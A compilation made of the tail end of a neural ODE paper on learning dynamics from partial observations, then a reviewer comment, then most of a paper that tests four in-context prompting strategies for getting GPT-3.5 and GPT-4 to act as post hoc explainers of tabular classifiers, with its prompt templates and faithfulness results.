the competing algorithms with nRMSE value that is 99.9%, 84.6% and 94.2% smaller than the nRMSEs obtained by PR-SMM, RM, and NODE, respectively. Analyzing the evolution of the latent states depicted in Figure 5, we notice that RNODE provides state trajectories that match the ground truth (GT) while PR-SSM and RM collapse catastrophically. The NODE learns the period of the hidden $\dot{q}_m$ signal but fails the capture its amplitude. The stiffness of $\dot{q}_m$ dynamics plays a role in these results since the sudden jumps shown in Figure 5 are hard to capture. This again demonstrates the robustness of the proposed approach. 6 CONCLUSIONS We proposed a novel recursive learning mechanism for NODE’s to address the challenging task of learning the complex dynamics of ODE systems with partial observations. Specifically, we constructed an alternating optimization procedure using Newton’s method that sequentially finds optimal system latent states and model parameters. The resulting framework, RNODE, allows for efficient learning of missing ODEs when latent states are distinguishable. Different from other competing methods, RNODE optimizes model parameters using latent states instead of observed data, leading to superior performance under the partial observation setting. Experiments performed with three complex synthetic systems and one with real data provide evidence that RNODE is capable of providing adequate solutions in very challenging scenarios, attesting RNODE’s superior performance when compared with other state-of-the-art strategies. REFERENCES Rohan Anil, Vineet Gupta, Tomer Koren, Kevin Regan, and Yoram Singer. Scalable second order optimization for deep learning. *arXiv preprint arXiv:2002.09018*, 2020. Joseph Bakarji, Kathleen Champion, J Nathan Kutz, and Steven L Brunton. Discovering governing equations from partial measurements with deep delay autoencoders. *arXiv preprint arXiv:2201.05136*, 2022. Joseph Bakarji, Kathleen Champion, J Nathan Kutz, and Steven L Brunton. Discovering governing equations from partial measurements with deep delay autoencoders. *Proceedings of the Royal Society A*, 479(2276):20230422, 2023. Bradley M Bell. The iterated kalman smoother as a gauss–newton method. *SIAM Journal on Optimization*, 4(3):626–636, 1994. Dimitri P Bertsekas. Incremental least squares methods and the extended kalman filter. *SIAM Journal on Optimization*, 6(3):807–822, 1996. VG Boltyanskiy, Revaz V Gamkrelidze, YEF Mishchenko, and LS Pontryagin. Mathematical theory of optimal processes. 1962. Aleksandar Botev, Hippolyt Ritter, and David Barber. Practical gauss-newton optimisation for deep learning. In *International Conference on Machine Learning*, pp. 557–565. PMLR, 2017. Mona Buisson-Fenet, Valery Morgenthaler, Sebastian Trimpe, and Florent Di Meglio. Recognition models to learn dynamics from partial observations with neural odes. *Transactions on Machine Learning Research*, 2022. Richard H Byrd, Samantha L Hansen, Jorge Nocedal, and Yoram Singer. A stochastic quasi-newton method for large-scale optimization. *SIAM Journal on Optimization*, 26(2):1008–1031, 2016. Ricky TQ Chen, Yulia Rubanova, Jesse Bettencourt, and David K Duvenaud. Neural ordinary differential equations. *Advances in neural information processing systems*, 31, 2018. Edward De Brouwer, Jaak Simm, Adam Arany, and Yves Moreau. Gru-ode-bayes: Continuous modeling of sporadically-observed time series. *Advances in neural information processing systems*, 32, 2019. Ahmet Demirkaya, Tales Imbiriba, Kyle Lockwood, Sumientra Rampersad, Elie Alhajjar, Giovanna Guidoboni, Zachary Danziger, and Deniz Erdogmus. Cubature Kalman filter based training of hybrid differential equation recurrent neural network physiological dynamic models. *43rd Annual International Conference of the IEEE Engineering in Medicine and Biology Society*, 2021. Andreas Doerr, Christian Daniel, Martin Schiegg, Nguyen-Tuong Duy, Stefan Schaal, Marc Tous-saint, and Trimpe Sebastian. Probabilistic recurrent state-space models. In *International conference on machine learning*, pp. 1280–1289. PMLR, 2018. John Duchi, Elad Hazan, and Yoram Singer. Adaptive subgradient methods for online learning and stochastic optimization. *Journal of machine learning research*, 12(7), 2011. Stefanos Eleftheriadis, Tom Nicholson, Marc Deisenroth, and James Hensman. Identification of gaussian process state space models. *Advances in neural information processing systems*, 30, 2017. Paul Ghanem, Yunus Bicer, Deniz Erdogmus, and Alireza Ramezani. Efficient modeling of morphing wing flight using neural networks and cubature rules. *arXiv preprint arXiv:2110.01057*, 2021. Donald Goldfarb, Yi Ren, and Achraf Bahamou. Practical quasi-newton methods for training deep neural networks. *Advances in Neural Information Processing Systems*, 33:2386–2396, 2020. Robert Gower, Donald Goldfarb, and Peter Richtárik. Stochastic block bfgs: Squeezing more curvature out of data. In *International Conference on Machine Learning*, pp. 1869–1878. PMLR, 2016.
MOtZlKkvdz
I’m slightly confused about the insights we can draw from the experiments. Specifically, the authors propose 3 different explanation strategies that seem to perform reasonably similarly. I understand the overall message that LLMs have the potential to be used as explainers. However, the confusing part to me is there are 3 algorithms presented, and it’s hard to understand which one is better or when. I’d appreciate it if the authors could provide a concise discussion around this.
Are Large Language Models Post Hoc Explainers? Anonymous authors Paper under double-blind review Abstract Large Language Models (LLMs) are increasingly used as powerful tools for a plethora of natural language processing (NLP) applications. A recent innovation, in-context learning (ICL), enables LLMs to learn new tasks by supplying a few examples in the prompt during inference time, thereby eliminating the need for model fine-tuning. While LLMs have been utilized in several applications, their applicability in explaining the behavior of other models remains relatively unexplored. Despite the growing number of new explanation techniques, many require white-box access to the model and/or are computationally expensive, highlighting a need for next-generation post hoc explainers. In this work, we present the first framework to study the effectiveness of LLMs in explaining other predictive models. More specifically, we propose a novel framework encompassing multiple prompting strategies: i) Perturbation-based ICL, ii) Prediction-based ICL, iii) Instruction-based ICL, and iv) Explanation-based ICL, with varying levels of information about the underlying ML model and the local neighborhood of the test sample. We conduct extensive experiments with real-world benchmark datasets to demonstrate that LLM-generated explanations perform on par with state-of-the-art post hoc explainers using their ability to leverage ICL examples and their internal knowledge in generating model explanations. On average, across four datasets and two ML models, we observe that LLMs identify the most important feature with 72.19% accuracy, indicating promising avenues for further research into LLM-based explanation frameworks within explainable artificial intelligence (XAI). 1 Introduction Over the past decade, machine learning (ML) models have become ubiquitous across various industries and applications. With their increasing use in critical applications (e.g., healthcare, financial systems, and crime forecasting), it becomes essential to ensure that ML developers and practitioners understand and trust their decisions. To this end, several approaches (Ribeiro et al., 2016; 2018; Smilkov et al., 2017; Sundararajan et al., 2017; Lundberg & Lee, 2017; Shrikumar et al., 2017) have been proposed in explainable artificial intelligence (XAI) literature to generate explanations for understanding model predictions. However, these explanation methods are highly sensitive to changes in their hyperparameters (Yeh et al., 2019; Bansal et al., 2020), require access to the underlying black-box ML model (Lundberg & Lee, 2017; Ribeiro et al., 2016), and/or are often computationally expensive (Situ et al., 2021), thus impeding reproducibility and the trust of relevant stakeholders. More recently, generative models such as Large Language Models (LLMs) (Radford et al., 2017) have steered ML research into new directions and shown exceptional capabilities, allowing them to surpass state-of-the-art models at complex tasks like machine learning translation (Hendy et al., 2023), language understanding (Brown et al., 2020), commonsense reasoning (Wei et al., 2022b; Krishna et al., 2023), and coding tasks (Bubeck et al., 2023). However, there is very little work on systematically analyzing the reliability of LLMs as explanation methods. While recent research has used LLMs to explain what patterns in a text cause a neuron to activate, they simply explain correlations between the network input and specific neurons and do not explain what causes model behavior at a mechanistic level (Bills et al., 2023). Thus, the ability of LLMs to act as reliable explainers and improve the understanding of ML models lacks sufficient exploration. Figure 1: Overview of our framework. Given a dataset and model to explain, we provide 1) different prompting strategies to generate explanations using LLMs, 2) functions to parse LLM-based explanations, 3) utility functions to support new LLMs, and 4) diverse performance metrics to evaluate the faithfulness of explanations. Present work. In this work, we present the first framework to study the effectiveness of LLMs in explaining other predictive models (see Fig. 1). More specifically, we introduce four broad prompting strategies — Perturbation-based ICL, Prediction-based ICL, Instruction-based ICL, and Explanation-based ICL — for generating post hoc explanations using LLMs. Our first three strategies entail providing local neighborhood samples and labels of a given instance whose prediction we want to explain, before asking an LLM to identify features that are key drivers in the model’s predictions. In our last approach, we leverage the in-context learning (ICL) (Liu et al., 2023b) behavior of LLMs by providing a small set of instances and their corresponding explanations (output by state-of-the-art post hoc explanation methods) as input to an LLM and ask it to generate feature importance-based explanations for new samples. We also explore different prompting and design choices, such as increasing the level of information in each, to generate more faithful explanations using LLMs. We conduct extensive experimentation with four benchmark datasets, two black-box models, and two GPT models to analyze the efficacy of our proposed framework. Our empirical studies reveal the following key findings. 1) LLMs, on average, accurately identify the most important feature (top-k=1) with 72.19% accuracy across different datasets, with performance drop for larger values of top-k features. 2) LLMs can mimic the behavior of six state-of-the-art post hoc explanation methods using the proposed Explanation-based ICL prompting strategy and only four ICL samples. On average, LLMs behave as post hoc explainers by providing explanations that are on par with existing methods, such as LIME and gradient-based methods, in terms of their faithfulness. 3) LLMs struggle to retrieve relevant information from longer prompts, resulting in a decrease in the faithfulness of the explanations generated using a large set of ICL samples. 4) Our proposed framework paves the way for a new paradigm in XAI research, where LLMs can aid in explaining black-box model predictions. 2 RELATED WORKS Our work lies at the intersection of post hoc explanations, large language models, and in-context learning, which we discuss below. Post Hoc Explanations. The task of understanding model predictions has become increasingly intricate with the growing popularity of complex ML models (Doshi-Velez & Kim, 2017) due to their inherent black box nature, which makes it difficult to interpret their internal reasoning. To this end, a plethora of feature attribution methods (commonly referred to as post hoc explanation methods) have been proposed to provide explanations for these models’ predictions. These explanations are predominantly presented in the form of feature attributions, which highlight the importance of each input feature on the model’s prediction. Broadly, post hoc explainers can be divided into perturbation-based and gradient-based methods. While perturbation-based methods (Ribeiro et al., 2016; Lundberg & Lee, 2017; Zeiler & Fergus, 2014) leverage perturbations of the given instance to construct an interpretable approximation of the black-box model behavior, gradient-based methods (Smilkov et al., 2017; Sundararajan et al., 2017) leverage gradients w.r.t. the given instance to explain model predictions. In this work, we primarily focus on state-of-the-art local post hoc explainers, i.e., methods explaining individual feature importance for model predictions of individual instances. Large Language Models. LLMs have seen exponential growth in recent years, both in terms of their size and the complexity of tasks they can perform (Radford et al., 2017). Recent advances in LLMs like GPT-4 (OpenAI), Bard (Google), Claude-2 (Anthropic) and Llama-2 (Meta) are changing the paradigm of NLP research and have led to their widespread use across applications spanning machine translation (Vaswani et al., 2017), question-answering (Brown et al., 2020), text genera- tion (Radford et al., 2017), and medical data records (Lee et al., 2020; Alsentzer et al., 2019). In this work, we, for the first time, explore the use of LLMs in explaining other predictive models. **In-context Learning.** While the high performance and generalization capabilities have led to highly effective language models for numerous tasks (Wei et al., 2022a), they have also increased the models’ parameter sizes and the computational costs for additional fine-tuning on new downstream tasks. To alleviate this, recent works have introduced **in-context learning (ICL)**, which allows an LLM to perform well on new tasks by simply using a few task samples in the prompt (Liu et al., 2023b). Despite their effectiveness in enhancing the performance of LLMs, these methods have not been thoroughly explored for their potential to generate post-hoc explanations. In this work, we investigate the utility of LLMs in generating post hoc explanations by leveraging their in-context learning abilities. ### 3 Our Framework Next, we describe our framework that aims to generate explanations using LLMs. To achieve this goal, we outline four distinct prompting strategies — **Perturbation-based ICL (Sec. 3.1), Prediction-based ICL (Sec. 3.2), Instruction-based ICL (Sec. 3.3),** and **Explanation-based ICL (Sec. 3.4).** **Notation.** Let \( f : \mathbb{R}^d \rightarrow [0, 1] \) denote a black-box ML model that takes an input \( x \in \mathbb{R}^d \) and returns the probability of \( x \) belonging to a class \( c \in C \) and the predicted label \( y \). Following previous XAI works (Ribeiro et al., 2016; Smilkov et al., 2017), we randomly sample points from the local neighborhood \( N_x \) of the given input \( x \) to generate explanations, where \( N_x = N(x, \sigma^2) \) denotes the neighborhood of perturbations around \( x \) using a Normal distribution with mean 0 and variance \( \sigma^2 \). #### 3.1 Perturbation-based ICL In the Perturbation-based ICL prompting strategy, we use an LLM to explain \( f \), trained on tabular data, by querying the LLM to identify the top-\( k \) most important features in determining the output of \( f \) in a rank-ordered manner. To tackle this, we sample input-output pairs from the neighborhood \( N_x \) of \( x \) and generate their respective strings following a serialization template; for instance, a perturbed sample’s feature vector \( x' = [0.058, 0.632, -0.015, 1.012, -0.022, -0.108] \), belonging to class 0 in the COMPAS dataset, is converted into a natural-language string as: ``` # Serialization template Input: A = 0.058, B = 0.632, C = -0.015, D = 1.012, E = -0.022, F = -0.108 Output: 0 ``` While previous post hoc explainers suggest using a large number of neighborhood samples (Ribeiro et al., 2016; Smilkov et al., 2017), it is impractical to provide all samples from \( N_x \) in the prompt for an LLM due to their constraint on the maximum context length and performance loss when given more information (Liu et al., 2023a). Consequently, we select \( n_{ICL} \) samples from \( N_x \) to use in the LLM’s prompt. In the interest of maintaining a neutral and fundamental approach, we employ two primary sampling strategies, both selecting balanced class representation within the neighborhoods defined by \( N_x \). The first strategy selects samples randomly, while the second chooses those with the highest confidence levels, aiding the LLM in generating explanations centered on model certainty. Given \( n_{ICL} \) input-output pairs from \( N_x \) and the test sample \( x \) to be explained, we add context with respect to the predictive model, dataset, and task description in our prompt to aid the LLM in behaving like a post hoc explanation method. Motivated by the local neighborhood approximation works in XAI, the Perturbation-based ICL prompting strategy presumes that the local behavior of \( f \) is a simple linear decision boundary, contrasting with the often globally exhibited complex non-linear decision boundary. Hence, assuming a sufficient number of perturbations in \( N_x \), the LLM is expected to accurately approximate the black box model’s behavior and utilize this information to identify the top-\( k \) most important features. The final prompt structure is given below, where the “Context” provides the LLM with the background of the underlying ML model, the number of features in the dataset, and model predictions, “Dataset” denotes the \( n_{ICL} \) instances sampled from the neighborhood \( N_x \) of \( x \), “Question” is the task we want our LLM to perform, and “Instructions” are the guidelines we want the LLM to follow while generating the output explanations. 3.2 Prediction-based ICL Here, we devise Prediction-based ICL, a strategy closer to the traditional ICL prompting style, where the primary objective remains the same — understanding the workings of the black-box model $f$ by identifying the top-$k$ most important features. This strategy positions the LLM to first emulate the role of the black-box model by making predictions, staging it to extract important features that influenced its decision. We follow the perturbation strategy of Sec. 3.1 and construct the Prediction-based ICL prompt using $n_{ICL}$ input-output pairs from $\mathcal{X}_S$. The main difference in the Prediction-based ICL prompting strategy lies in the structuring of the prompt, which is described below: # Prediction-based ICL Prompt Template **Context:** “We have a two-class machine learning model that predicts based on 6 features: ['A', 'B', 'C', 'D', 'E', 'F']. The model has been trained on a dataset and has made the following predictions.” **Dataset:** Input: A = -0.158, B = 0.293, C = 0.248, D = 1.130, E = 0.013, F = -0.038 Output: 0 Input: A = 0.427, B = 0.016, C = -0.128, D = 0.949, E = 0.035, F = -0.045 Output: 1 **Question:** “Based on the model’s predictions and the given dataset, estimate the output for the final input. What appears to be the top five most important features in determining the model’s prediction?” **Instructions:** “Think about the question. After explaining your reasoning, provide your answer as the top five most important features ranked from most important to least important, in descending order. Only provide the feature names on the last line. Do not provide any further details on the last line.” Here, we construct the prompt using the task description followed by the $n_{ICL}$ ICL samples and then ask the LLM to provide the predicted label for the test sample $x$ and explain how it generated that label. The primary motivation behind the Prediction-based ICL prompting strategy is to investigate whether the LLM can learn the classification task using the ICL set and, if successful, identify the important features in the process. This approach aligns more closely with the traditional ICL prompting style, offering a different perspective on the problem. 3.3 Instruction-based ICL The Instruction-based prompting transitions from specifying task objectives to providing detailed guidance on the strategy for task execution. Rather than solely instructing the LLM on what the task entails, this strategy delineates how to conduct the given task. The objective remains to understand the workings of the black-box model and identify the top-$k$ most important features. However, in using step-by-step directives, we aim to induce a more structured and consistent analytical process within the LLM to target more faithful explanations. The final prompt structure is as follows: # Instruction-based ICL Prompt Template **Context:** “We are analyzing a fixed set of perturbations around a specific input to understand the influence of each feature on the model’s output. The dataset below contains the change in features ‘A’ through ‘F’ (with negative values denoting a decrease in a feature’s value) and the corresponding outputs.” **Dataset:** - Change in Input: A: -0.217, B: 0.240, C: 0.114, D: 0.007, E: 0.091, F: 0.025 - Change in Output: -1 ... - Change in Input: A: 0.185, B: -0.185, C: -0.232, D: -0.130, E: -0.020, F: 0.015 - Change in Output: 0 **Instructions:** “For each feature, starting with ‘A’ and continuing to ‘F’: 1. Analyze the feature in question: a. Compare instances where its changes are positive to where its changes are negative and explain how this difference correlates with the change in output. b. Rate the importance of the feature in determining the output on a scale of 0-100, considering both positive and negative correlations. Ensure to give equal emphasis to both positive and negative correlations and avoid focusing only on absolute values. 2. After analyzing the feature, position it in a running rank compared to the features already analyzed. For instance, after analyzing feature ‘B’, determine its relative importance compared to ‘A’ and position it accordingly in the rank (e.g., BA or AB). Continue this process until all features from ‘A’ to ‘F’ are ranked. Upon completion of all analyses, provide the final rank of features from ‘A’ to ‘F’ on the last line. Avoid providing general methodologies or suggesting tools. Justify your findings as you go.” Here, we provide some general instructions to the LLM for understanding the notion of important features and how to interpret them through the lens of correlation analysis. To achieve this, we instruct LLMs to analyze each feature sequentially and ensure that both positive and negative correlations are equally emphasized. The LLM assigns an importance score for each feature in the given dataset and then positions it in a running rank. This rank is necessary to differentiate features and avoid ties in the LLM’s evaluations. The final line ensures that the LLM’s responses are strictly analytical, minimizing non-responsiveness or digressions into tool or methodology recommendations. ### 3.4 Explanation-based ICL Recent studies show that LLMs can learn new tasks through ICL, enabling them to excel in new downstream tasks by merely observing a few instances of the task in the prompt. In the Explanation-based ICL prompting strategy, we leverage the ICL capability of LLMs to alleviate the computation complexity of some post hoc explanation methods. In particular, we investigate whether an LLM can mimic the behavior of a post hoc explainer by looking at a few input, output, and explanation examples. We generate explanations for a given test sample \( x \) using LLMs by utilizing the ICL framework and supplying \( n_{ICL} \) input, output, and explanation examples to the LLM, where the explanations in the ICL can be generated using any post hoc explanation method. For constructing the ICL set, we randomly select \( n_{ICL} \) input instances \( X_{ICL} \) from the ICL split of the dataset and generate their predicted labels \( y_{ICL} \) using model \( f \). Next, we generate explanations \( E_{ICL} \) for samples \((X_{ICL}, y_{ICL})\) using any post hoc explainer. Using the above input, output, and explanation samples, we construct a prompt by concatenating each pair as follows: # Explanation-based ICL Prompt Template Input: A = 0.172, B = 0.000, C = 0.000, D = 1.000, E = 0.000, F = 0.000 Output: 1 Explanation: A,C,B,F,D,E ... Input: A = 0.052, B = 0.053, C = 0.073, D = 0.000, E = 0.000, F = 1.000 Output: 0 Explanation: A,B,C,E,FD Input: A = 0.180, B = 0.222, C = 0.002, D = 0.000, E = 0.000, F = 1.000 Output: 0 Explanation: Using the Explanation-based ICL prompting strategy, we aim to investigate the learning capability of LLMs such that they can generate faithful explanations by examining the \( n_{ICL} \) demonstration pairs of inputs, outputs, and explanations generated by state-of-the-art post hoc explainer. 4 EXPERIMENTS Next, we evaluate the effectiveness of LLMs as post hoc explainers. More specifically, our experimental analysis focuses on the following questions: Q1) Can LLMs generate faithful post hoc explanations? Q2) Do LLM-Augmented post hoc explainers achieve similar faithfulness vs. their vanilla counterpart? Q3) Are LLMs better than state-of-the-art post hoc explainers at identifying the most important feature? Q4) Is Gpt-4 a better explainer than Gpt-3.5? Q5) Are changes to the LLM’s prompting strategy necessary for generating faithful explanations? 4.1 DATASETS AND EXPERIMENTAL SETUP We first describe the datasets and models used to study the reliability of LLMs as post hoc explainers and then outline the experimental setup. Datasets. Following previous LLM works (Hegselmann et al., 2023), we performed analysis on four real-world tabular datasets: Blood (Yeh et al., 2009) having four features, Recidivism (ProPublica) having six features, Adult (Kaggle) having 13 features, and Default Credit (UCI) having 10 features. The datasets come with a random train-test split, and we further subdivide the train set, allocating 80% for training and the remaining 20% for ICL sample selection, as detailed in Sec. 3.4. We use a random set of 100 samples from the test split to generate explanations for all of our experiments. Predictive Models. We consider two ML models with varying complexity in our experiments: i) Logistic Regression (LR) and ii) Artificial Neural Networks (ANN). We use PyTorch (Paszke et al., 2019) to implement the ANNs with the following combination of hidden layers: one layer of size 16 for the LR model; and three layers of size 64, 32, and 16 for the ANN, using ReLU for the hidden layers and SOFTMAX for the output (see Table 1 for predictive performances of these models). Large Language Model. We consider Gpt-3.5 and Gpt-4 as language models for all experiments. Baseline Explanation Methods. We use six post hoc explainers as baselines to investigate the effectiveness of explanations generated using LLMs: LIME (Ribeiro et al., 2016), SHAP (Lundberg & Lee, 2017), Vanilla Gradients (Zeiler & Fergus, 2014), SmoothGrad (Smilkov et al., 2017), Integrated Gradients (Sundararajan et al., 2017), and Gradient x Input (ITG) (Shrikumar et al., 2017). Performance Metrics. We employ four distinct metrics to measure the faithfulness of an explanation. To quantify the faithfulness of an explanation where there exists a ground-truth top-k explanation for each test input (i.e., LR model coefficients), we use the Feature Agreement (FA) and Rank Agreement (RA) metrics introduced in Krishna et al. (2022), which compares the LLM’s top-k directly with the model’s ground-truth. The FA and RA metrics range from [0, 1], where 0 means no agreement and 1 means full agreement. However, in the absence of a top-k ground-truth explanation (as is the case with ANNs), we use the Prediction Gap on Important feature perturbation (PGI) and the Prediction Gap on Unimportant feature perturbation (PGU) metrics from OpenXAI (Agarwal et al., 2022). While PGI measures the change in prediction probability that results from perturbing the features deemed as influential, PGU examines the impact of perturbing unimportant features. Here, the perturbations are generated using Gaussian noise \( N(0, \sigma^2) \). Implementation Details. To generate perturbations for each ICL prompt, we use a neighborhood size of \( \sigma = 0.1 \) and generate local perturbation neighborhoods \( \mathcal{N}_x \) for each test sample \( x \). We sample \( n_x = 10,000 \) points sampled for each neighborhood, where the values for \( \sigma \) and \( n_x \) were chosen to give an equal number of samples for each class, whenever possible. We present perturbations in two main formats: as the raw perturbed inputs alongside their corresponding outputs (shown in the Sec. 3.1 and 3.2 templates); or as the change between each perturbed input and the test sample, and the corresponding change in output (shown in Sec. 3.3). The second approach significantly aids the LLM in discerning the most important features (see Fig. 1), providing only the changes relative to the test sample, and bypassing the LLM’s need to internally compute these differences. As a result, the consistent value of the original test point becomes irrelevant, and this clearer, relational view allows the LLM to focus directly on variations in input and output. Note that both of these formats are absent from Sec. 3.4 which uses test samples directly and does not compute perturbations. For the LLMs, we use OpenAI’s text generation API with a temperature of \( \tau = 0 \) for our main experiments. To evaluate the LLM explanations, we extract and process its answers to identify the top-k most important features. We first save each LLM query’s reply to a text file and use a script to extract the features. We added explicit instructions like “... provide your answer as a feature name on the last line. Do not provide any further details on the last line.” to ensure reliable parsing of LLM outputs. In rare cases, the LLM won’t follow our requested response format or it replies with “I don’t have enough information to determine the most important features.” See Appendix [6.1] for further details. 4.2 Results Next, we discuss experimental results that answer key questions highlighted at the beginning of this section about LLMs as post hoc explainers (Q1-Q5). 1) LLMs can generate faithful explanations. We compare our proposed prompting-based LLM explanation strategies to existing post hoc explainers on the task of identifying important features for understanding ANN (Fig. 2) and LR (Fig. 3) model predictions across four real-world datasets (see Table 2). For the ANN model, the LLM-based explanations perform on par with the gradient-based methods (despite having white-box access to the underlying black-box model) and LIME (that approximates model behavior using a surrogate linear model). In particular, our proposed prompting strategies perform better than ITG, SHAP, a Random baseline, and a 16-sample version of LIME, namely LIME$_{16}$, which is analogous to the number of ICL samples used in the LLM prompts. We observe that LLM explanations, on average, achieve 51.74% lower PGU and 163.40% higher PGI than ITG, SHAP, and Random baseline for larger datasets (more number of features) like Adult and Credit compared to 25.56% lower PGU and 22.86% higher PGI for Blood and Recidivism datasets. While our prompting strategies achieve competitive PGU and PGI scores among themselves across different datasets for ANN models, the Instruction-based ICL strategy, on average across datasets, achieves higher FA and RA scores for the LR model (Fig. 3). We find that gradient-based methods and LIME achieve almost perfect scores on FA and RA metrics as they are able to get accurate model gradients and approximate the model behavior with high precision. Interestingly, the LLM-based explanations perform better than ITG, SHAP, and Random baseline methods, even for a linear model. ![Figure 2: PGU and PGI scores of explanations generated using post hoc methods and LLMs (Instruction-based, Prediction-based, and Perturbation-based ICL prompting strategies) for an ANN model. On average, across four datasets, we find that LLM-based explanations perform on par with gradient-based and LIME methods and outperform LIME$_{16}$, ITG, and SHAP methods.](image) ![Figure 3: FA and RA scores of explanations generated using post hoc methods and LLMs (Instruction-based, Prediction-based, and Perturbation-based ICL prompting strategies) for an LR model. On average, across four datasets, we find that gradient-based methods and the LIME method (with 1000 samples) outperform all other methods and Instruction-based ICL explanations outperform other two prompting strategies across all datasets.](image) 2) LLM-augmented explainers achieve similar faithfulness to their vanilla counterparts. We evaluate the faithfulness of the explanations generated using the Explanation-based ICL prompting strategy. Our results show that LLMs generate explanations that achieve faithfulness performance on par with those generated using state-of-the-art post hoc explanation methods for LR and large ANN predictive models across all four datasets (Fig. 4, see Table 3 for complete results) and four evaluation metrics. We demonstrate that very few in-context examples (here, $m_{ICL} = 4$) are sufficient to make the LLM mimic the behavior of any post hoc explainer and generate faithful explanations, suggesting the effectiveness of LLMs as an explanation method. Interestingly, for low-performing explanation methods like ITG and SHAP, we find that explanations generated using their LLM counterparts achieve higher feature and rank agreement (Fig. 4) scores in the case of LR models, hinting that LLMs can use their internal knowledge to improve the faithfulness of explanations. ![Figure 4](image) **Figure 4:** Faithfulness metrics on the Recidivism dataset for six post hoc explainers and their LLM-augmented counterparts for a given LR (left) and ANN (right) model. LLM-augmented explanations achieve on-par performance w.r.t. post hoc methods across all four metrics (see Table 3 for complete results on all other datasets). 3) **LLMs accurately identify the most important feature.** To demonstrate the LLM’s capability in identifying the most important feature, we show the faithfulness performance of generated explanations across four datasets. Our results in Fig. 5 demonstrate the impact of different top-\(k\) feature values on the faithfulness of explanations generated using our prompting strategies. We observe a steady decrease in RA scores (0.722 for top-\(k\)=1 vs. 0.446 for top-\(k\)=2 vs. 0.376 for top-\(k\)=4) across three datasets (Blood, Credit, and Adult) as the top-\(k\) value increases. Interestingly, the RA value for top-\(k\)=1 for the Recidivism dataset is almost zero, though this can be attributed to the LLM’s handling of the two primary features, whose LR coefficients have nearly identical magnitudes; the LLM generally places them both within the top two but, due to their similar importance, defaults to alphabetical order. However, when employing our Instruction-based ICL running-rank strategy, we find that the RA value rises from 0 to 0.5, highlighting the influence of nuanced prompts on the LLM’s ranking mechanism. Further, we observe that LLMs, on average across four datasets and three prompting strategies, faithfully identify top-\(k\)=1 features with 72.19% FA score (see Fig. 12), and their faithfulness performance takes a hit for higher top-\(k\) values. In the context of our 72.19% result, baseline methods’ performances in identifying top-\(k\)=1 features are as follows: Random baseline (15%), SHAP (29.75%), ITG (29.5%), and LIME/IG/SG/Grad (100%) (see Tables 3-5). ![Figure 5](image) **Figure 5:** Effects of top-\(k\) value on the RA metric using Perturbation-based, Prediction-based, and Instruction-based ICL prompting strategies. Shown are the results for three prompting strategies and four datasets using the LR model. On average, LLMs successfully achieve high scores in identifying the most important feature (top-\(k\)=1) and the performance decreases as we increase the top-\(k\) value (see Fig. 12 for results on FA). 4) **GPT-3.5 vs. GPT-4.** An interesting question is how the reasoning capability of an LLM affects the faithfulness of the generated explanations. Hence, we compare the output explanations from GPT-3.5 and GPT-4 models to understand black-box model predictions. Results in Fig. 6 show that explanations generated using GPT-4, on average across four datasets, achieve higher faithfulness scores than explanations generated using the GPT-3.5 model. Across four prompting strategies, GPT-4, on average, obtains 4.53% higher FA and 48.01% higher RA scores than GPT-3.5 on explanations generated for the Adult dataset. We attribute this increase in performance of GPT-4 to its superior reasoning capabilities compared to the GPT-3.5 model (OpenAI, 2023). In Figure 6, we find that Instruction-based ICL, on average across four datasets, outperforms the Perturbation-based ICL and Prediction-based ICL strategies on the RA metric. Further, our results in Fig. 8 show that the faithfulness performance of GPT-4 and GPT-3.5 are on par with each other when evaluated using our Explanation-based ICL strategy, which highlights that both models are capable of emulating the behavior of a post hoc explainer by looking at a few input, output, and explanation examples. Figure 6: RA faithfulness metric of explanations generated using Perturbation-based ICL, Prediction-based ICL, and Instruction-based ICL prompting strategies on four real-world datasets. Explanations from GPT-4, on average, achieve higher RA scores than their GPT-3.5 counterparts (see Figures 8, 9 for similar plots on Feature Agreement metric and Explanation-based ICL strategy). 5) Ablation Study. We conduct ablations on several components of the prompting strategies, namely the number of ICL samples, perturbation format, and temperature values. Results show that our choice of hyperparameter values is important for the prompting techniques to generate faithful post hoc explanations (Figs. 7, 10). Our ablation on the number of ICL samples (Fig. 7) shows that fewer and larger numbers of ICL samples are not beneficial for LLMs to generate post hoc explanations. While fewer ICL samples provide insufficient information to the LLM to approximate the predictive behavior of the underlying ML model, a large number of ICL samples increases the input context, where the LLM struggles to retrieve relevant information from longer prompts, resulting in a decrease in the faithfulness of the explanations generated by LLMs. In contrast to LIME, the faithfulness of LLM explanations deteriorates upon increasing the number of ICL samples (analogous to the neighborhood of a given test sample). Across all four prompting strategies, we observe a drop in FA, RA, and PGI scores as we increase the number of ICL samples to 64. Further, our ablation on the temperature parameter of the LLMs shows that the faithfulness performance of the explanations does not change much across different values of temperature (see Appendix Fig. 10). Finally, results in Fig. 11 show that our prompting strategies achieve higher faithfulness when using the difference between the perturbed and test sample as input in the ICL sample. Figure 7: FA, RA, and PGI Performance of LIME and all four proposed prompting strategies as we increase the number of ICL samples (analogous to neighborhood samples in LIME) for the LR model trained on the Adult dataset. In contrast to LIME, the faithfulness of LLM explanations across different metrics decreases for a higher number of ICL samples, likely due to the limited capabilities of LLM for longer prompt length. 5 CONCLUSION We introduce and explore the potential of using state-of-the-art LLMs as post hoc explainers. To this end, we propose four prompting strategies — Perturbation-based ICL, Prediction-based ICL, Instruction-based ICL, and Explanation-based ICL — with varying levels of information about the local neighborhood of a test sample to generate explanations using LLMs for black-box model predictions. We conducted several experiments to evaluate LLM-generated explanations using four benchmark datasets. Our results across different prompting strategies highlight that LLMs can generate faithful explanations and consistently outperform methods like ITG and SHAP. Our work paves the way for several exciting future directions in explainable artificial intelligence (XAI) to explore LLM-based explanation frameworks. REFERENCES Chirag Agarwal, Satyapriya Krishna, Eshika Saxena, Martin Pawelczyk, Nari Johnson, Isha Puri, Marinka Zitnik, and Himabindu Lakkaraju. Openxai: Towards a transparent evaluation of model explanations. NeurIPS, 2022. Emily Alsentzer, John R Murphy, Willie Boag, Wei-Hung Weng, Di Jin, Tristan Naumann, and Matthew McDermott. Publicly available clinical bert embeddings. arXiv, 2019. Anthropic. Anthropic \claude 2. https://www.anthropic.com/index/claude-2 (Accessed on 07/17/2023). Naman Bansal, Chirag Agarwal, and Anh Nguyen. Sam: The sensitivity of attribution methods to hyperparameters. In CVPR, 2020. Steven Bills, Nick Cammarata, Dan Mossing, Henk Tillman, Leo Gao, Gabriel Goh, Ilya Sutskever, Jan Leike, Jeff Wu, and William Saunders. Language models can explain neurons in language models. https://openaipublic.blob.core.windows.net/neuron-explainer/paper/index.html 2023. Tom Brown, Benjamin Mann, Nick Ryder, Melanie Subbiah, Jared D Kaplan, Prafulla Dhariwal, 